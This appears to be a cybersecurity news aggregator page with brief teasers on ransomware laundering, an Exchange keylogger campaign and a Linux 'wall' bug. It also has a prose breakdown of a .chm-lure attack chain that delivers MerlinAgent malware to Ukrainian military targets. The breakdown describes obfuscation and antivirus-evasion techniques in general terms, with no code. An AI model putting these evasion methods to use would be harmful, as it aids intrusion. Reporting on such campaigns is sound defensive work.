Ransomware Hackers and Scammers Utilizing Cloud Mining to Launder Cryptocurrency
Ransomware actors and cryptocurrency scammers have joined nation-state actors in abusing cloud mining services to launder digital assets, new findings reveal.
"Cryptocurrency mining is a crucial part of our industry, but it also holds special appeal to bad actors, as it provides a means to acquire money with a totally clean on-chain original source," blockchain analytics firm Chainalysis said in Read More
The Hacker News | #1 Trusted Cybersecurity News Site
MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks
An unknown threat actor is exploiting known security flaws in Microsoft Exchange Server to deploy a keylogger malware in attacks targeting entities in Africa and the Middle East.
Russian cybersecurity firm Positive Technologies said it identified over 30 victims spanning government agencies, banks, IT companies, and educational institutions. The first-ever compromise dates back to 2021.
“This Read More
New Linux Bug Could Lead to User Password Leaks and Clipboard Hijacking
[[{“value”:”Details have emerged about a vulnerability impacting the "wall" command of the util-linux package that could be potentially exploited by a bad actor to leak a user’s password or alter the clipboard on certain Linux distributions.
The bug, tracked as CVE-2024-28085, has been codenamed WallEscape by security researcher Skyler Ferrante. It has been described as a case of improper”}]] Read More
The Hacker News | #1 Trusted Cybersecurity News Site
Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware
Here’s a Breakdown of the Attack Chain:
Lure File – The deceptive file is disguised as a Microsoft Help file, commonly known as a .chm file. Specifically, it was titled “Інфо про навчання по БПЛА для військових.v2.2.chm,” which translates to “information about UAV training for the military.”
When the user opens this document, it triggers a malicious JavaScript code embedded within it.
Obfuscated PowerShell – The JavaScript code within the .chm file communicates with a remote Command and Control (C2) server to download an obfuscated binary payload.
Payload Activation – This payload, once decoded, becomes a beacon payload for the MerlinAgent malware, establishing communication with the C2 server and granting full control to the attackers.
The attack chain may seem straightforward, but the threat actors employed complex tactics and obfuscation methods to avoid detection at each stage.
Initial Code Execution – Microsoft Help files, despite being an older format, can still be executed on modern Windows systems.
In this case, the .chm file launched the PowerShell process, bypassing antivirus and EDR detections.
Help File and JavaScript Execution – These files acted as containers, and their contents were analyzed, revealing obfuscated JavaScript code that executed another obfuscated PowerShell script.
PowerShell Execution – The PowerShell code involved multiple layers of obfuscation, including Base64 encoding, GZIP compression, and character substitutions. It downloaded the payload from a specific URL, deobfuscated it, and saved it locally.
Binary File Analysis – The downloaded binary, roughly 5MB in size, turned out to be a 64-bit executable associated with the MerlinAgent framework, an open-source command and control (C2) framework available on GitHub.
This framework offers various capabilities, including encrypted C2 communication, remote command shells, module support, and more.
C2 and Infrastructure – The attackers established encrypted communication with C2 servers over port 443, making detection more challenging.
This highly targeted attack campaign focused on the Ukrainian military. The use of files and documents that could easily bypass defenses and the attackers’ clever framing underscores the need for vigilance.
Securonix recommends several mitigations, including avoiding downloading files from untrusted sources, monitoring specific directories for suspicious activities, and deploying enhanced logging solutions for improved detection coverage.
Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.